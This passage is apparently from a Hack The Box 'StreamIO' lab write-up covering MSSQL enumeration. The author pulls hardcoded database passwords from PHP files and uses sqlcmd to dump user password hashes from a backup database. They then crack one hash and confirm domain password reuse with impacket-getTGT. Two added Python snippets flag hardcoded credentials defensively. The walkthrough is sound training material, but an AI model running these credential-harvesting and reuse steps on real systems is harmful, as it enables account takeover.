MSSQL
During the SQL injection analysis earlier, it became evident that an MSSQL server was present, hosting two non-default databases. However, interaction with one of these databases proved challenging, as there was no response.
The MSSQL instance, discussed in the MSSQL instance section, was found to be actively running on the default port 1433. Furthermore, detailed information about its installation was successfully confirmed.
This discovery opens avenues for further investigation, as the existence of non-default databases and the potential difficulty in interacting with one of them raise questions about the underlying data structure, access controls, and overall database security.
Looking further into the web root directory, the following code blocks reveal SQL connection strings embedded in the PHP source code of two distinct files: watch.streamio.htb\search.php and streamio.htb\admin\index.php. These connection strings are what establish the link between the web application and the corresponding Microsoft SQL Server (MSSQL) database.
ps c:\inetpub> cat watch.streamio.htb\search.php | findstr 'connection'
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
This credential was seen earlier and was the authenticated account during the SQL injection:
- database: STREAMIO
- user id: db_user
- password: B1@hB1@hB1@h
I was unable to enumerate the streamio_backup DB with this credential.
ps c:\inetpub> cat streamio.htb\admin\index.php | findstr 'connection'
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);
This credential was initially found via the file read through the PHP conversion filter earlier, before even gaining a foothold. As its name suggests, this credential appears to carry administrative-level privileges:
- database: STREAMIO
- user id: db_admin
- password: B1@hx31234567890
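A defender's check for this class of finding, added here and not part of the original writeup: scan PHP files under the web root for sqlsrv_connect() connection arrays and report the embedded logins, so hardcoded database credentials are caught before they reach a server. The file contents are reproduced inline as constructed sample input, and the looks_privileged naming heuristic is an assumption, not a permission check.

```python
import re
from typing import Dict, List

# Constructed sample input: the two sqlsrv_connect() connection arrays this page
# found under C:\inetpub, reproduced inline so the scan runs offline.
SAMPLE_FILES = {
    r"watch.streamio.htb\search.php": """
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
""",
    r"streamio.htb\admin\index.php": """
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);
""",
}

# A PHP array literal assigned to a variable: $name = array( ... );
_ARRAY = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\)\s*;", re.S)
# One entry inside it, "Key" => "value", with either quote style and optional whitespace.
_ENTRY = re.compile(r"""(["'])(Database|UID|PWD)\1\s*=>\s*(["'])(.*?)\3""")

def parse_connection_arrays(php_source: str) -> List[Dict[str, str]]:
    """Return every connection array in one PHP file that carries a login and password."""
    found = []
    for m in _ARRAY.finditer(php_source):
        entries = {key: value for _q1, key, _q2, value in _ENTRY.findall(m.group(2))}
        if "UID" in entries and "PWD" in entries:
            entries["variable"] = m.group(1)
            found.append(entries)
    return found

def scan_web_root(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Flag hardcoded MSSQL credentials across a web root (path -> source mapping)."""
    findings = []
    for path, source in files.items():
        for conn in parse_connection_arrays(source):
            user = conn["UID"]
            findings.append({
                "file": path,
                "database": conn.get("Database", ""),
                "user": user,
                "password": conn["PWD"],
                # Naming heuristic only (an assumption, not a permission check): logins
                # called sa or *admin deserve a look at their actual server roles.
                "looks_privileged": user.lower() == "sa" or user.lower().endswith("admin"),
            })
    return findings
```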
With these DB credentials at hand, the MSSQL instance can be explored further.
sqlcmd
Much like the command line tool for MySQL, there is a command line tool for MSSQL: sqlcmd, which ships with MSSQL by default.
PS C:\inetpub\streamio.htb\admin> sqlcmd -?
Microsoft (R) SQL Server Command Line Tool
Version 15.0.2000.5 NT
Copyright (C) 2019 Microsoft Corporation. All rights reserved.
usage: Sqlcmd [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-N Encrypt Connection][-C Trust Server Certificate]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w screen width]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-c cmdend] [-L[c] list servers[clean output]]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-m errorlevel] [-V severitylevel] [-W remove trailing spaces]
[-u unicode output] [-r[0|1] msgs to stderr]
[-i inputfile] [-o outputfile] [-z new password]
[-f <codepage> | i:<codepage>[,o:<codepage>]] [-Z new password and exit]
[-k[1|2] remove[replace] control characters]
[-y variable length type display width]
[-Y fixed length type display width]
[-p[1] print statistics[colon format]]
[-R use client regional setting]
[-K application intent]
[-M multisubnet failover]
[-b On error batch abort]
[-v var = "value"...] [-A dedicated admin connection]
[-X[1] disable commands, startup script, environment variables [and exit]]
[-x disable variable substitution]
[-j Print raw error messages]
[-g enable column encryption]
[-G use Azure Active Directory for authentication]
[-? show syntax summary]
There it is. I’ll start by checking the users.
Users
ps c:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q 'SELECT name FROM master..syslogins'
name
--------------------------------------------------------------------------------------------------------------------------------
sa
##MS_SQLResourceSigningCertificate##
##MS_SQLReplicationSigningCertificate##
##MS_SQLAuthenticatorCertificate##
##MS_PolicySigningCertificate##
##MS_SmoExtendedSigningCertificate##
##MS_PolicyEventProcessingLogin##
##MS_PolicyTsqlExecutionLogin##
##MS_AgentSigningCertificate##
BUILTIN\Administrators
NT SERVICE\SQLWriter
NT SERVICE\Winmgmt
NT Service\MSSQLSERVER
streamIO\Administrator
BUILTIN\Users
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY
db_user
db_admin
(19 rows affected)
A much different result compared to the earlier SQLi.
streamio_backup DB
PS C:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q 'SELECT name FROM master..sysdatabases;;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
STREAMIO
streamio_backup
(6 rows affected)
Same result. The streamio_backup DB hasn’t been enumerated.
PS C:\inetpub\streamio.htb\admin> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.information_schema.tables;"
table_name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)
While the streamio_backup DB contains the very same tables as the STREAMIO DB, the content may be different. I will check the users table.
streamio_backup.users Table
ps c:\inetpub> sqlcmd -U db_admin -P 'B1@hx31234567890' -Q "SELECT * FROM streamio_backup.dbo.users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
The content is indeed different, as there is a credential for the nikk37 user, who is also a valid domain user. I will grab those hashes and get cracking.
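The same reuse question from the defender's side, as an added example that is not part of the original writeup: parse a sqlcmd dump of the backup users table and report which database accounts also exist in the domain, since a crackable hash for such an account is a candidate domain password, and which rows store a bare digest with no salt visible. The dump rows, the padding helper and the domain user list are constructed; treating the 32-hex values as unsalted MD5-length digests is an assumption drawn from their format, not something the page states.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample: the first three rows of the streamio_backup.dbo.users dump
# shown on this page, padded the way sqlcmd pads columns (ints right-aligned,
# strings left-aligned to the column width).
_ROWS = [
    (1, "nikk37", "389d14cb8e4e9b94b137deb1caf0612a"),
    (2, "yoshihide", "b779ba15cedfd22a023c4d8bcf5f2332"),
    (3, "James", "c660060492d9edcaa8332d89c99c9239"),
]
SQLCMD_DUMP = "\n".join(
    [f"{'id':<11} {'username':<50} {'password':<50}", "-" * 11 + " " + "-" * 50 + " " + "-" * 50]
    + [f"{i:>11} {u:<50} {p:<50}" for i, u, p in _ROWS]
    + ["", "(3 rows affected)"]
)
# Constructed domain account list; on this page only nikk37 is confirmed as a domain user.
DOMAIN_USERS = {"Administrator", "nikk37", "svc_backup"}

_HEX32 = re.compile(r"^[0-9a-f]{32}$")          # MD5-length lowercase hex, no salt visible
_ROWCOUNT = re.compile(r"^\(\d+ rows? affected\)$")

def parse_sqlcmd_table(dump: str) -> List[Dict[str, str]]:
    """Parse sqlcmd's fixed-width output, taking column spans from the dash separator line."""
    lines = [ln for ln in dump.splitlines() if ln.strip()]
    header, sep = lines[0], lines[1]
    spans = [(m.start(), m.end()) for m in re.finditer(r"-+", sep)]
    names = [header[s:e].strip() for s, e in spans]
    rows = []
    for line in lines[2:]:
        if _ROWCOUNT.match(line):          # "(N rows affected)" ends the result set
            break
        rows.append({n: line[s:e].strip() for n, (s, e) in zip(names, spans)})
    return rows

def domain_overlap(rows: List[Dict[str, str]], domain_users: Iterable[str]) -> List[str]:
    """Usernames that also exist in the domain: a cracked hash here is a domain password candidate."""
    domain = {u.lower() for u in domain_users}
    return [r["username"] for r in rows if r["username"].lower() in domain]

def bare_digest_rows(rows: List[Dict[str, str]]) -> List[str]:
    """Usernames whose password column is a bare 32-hex digest (assumed unsalted MD5)."""
    return [r["username"] for r in rows if _HEX32.match(r["password"])]

if __name__ == "__main__":
    table = parse_sqlcmd_table(SQLCMD_DUMP)
    print("rows:", len(table), "bare digests:", bare_digest_rows(table))
    print("overlap with domain:", domain_overlap(table, DOMAIN_USERS))
```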
Password Cracking
Running those hashes through crackstation.net revealed one newly cracked password: get_dem_girls2@yahoo.com. The rest appear to be the same as the ones cracked from the SQLi earlier (webcreds.txt). I will check for password reuse by attempting to authenticate as the nikk37 user with this credential.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ impacket-getTGT streamio.htb/nikk37@dc.streamio.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: get_dem_girls2@yahoo.com
[*] Saving ticket in nikk37@dc.streamio.htb.ccache
Validated, and password reuse confirmed: a TGT was created for the nikk37 user. Since the nikk37 user is part of the Remote Management Users group, I can WinRM directly into the target system.
Moving on to the Lateral Movement phase